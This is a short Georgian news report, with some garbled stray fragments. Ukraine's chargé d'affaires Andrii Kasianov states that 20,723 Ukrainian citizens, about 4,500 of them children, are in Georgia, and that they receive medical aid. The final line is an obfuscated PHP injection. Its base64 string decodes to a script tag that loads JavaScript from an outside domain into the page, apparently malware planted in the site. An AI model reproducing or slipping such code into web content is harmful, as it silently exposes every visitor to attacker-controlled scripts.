celsiusi
ავერსი შნაიდერი
საქართველოში უკრაინის დროებითი რწმუნებულის, ანდრეი კასიანოვის განცხადებით, საქართველოში ამ ეტაპზე უკრაინის 20 723 მოქალაქე იმყოფება. ამის შესახებ კასიანოვმა ბრიფინგზე ჟურნალისტებს განუცხადა. 
 
„ინფორმაციის შესაბამისად, რომელსაც უმაღლესი კომისრის ოფისიდან ვიღებთ, 3 აპრილის მდგომარეობით, საქართველოს ტერიტორიაზე უკრაინის 20 723 მოქალაქე იმყოფება. დაახლოებით 4 500 არის ბავშვი. 
 
ვმუშაობთ განათლების მიმართულებით, ასევე მერიასთან და ტურიზმის სააგენტოსთან. საქართველოს მთავრობამ მიიღო გადაწყვეტილება, რომ ჩვენს მოქალაქეებს შესაბამისი სამედიცინო დახმარება გაეწიოთ“,- განაცხადა ანდრეი კასიანოვმა.
756
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");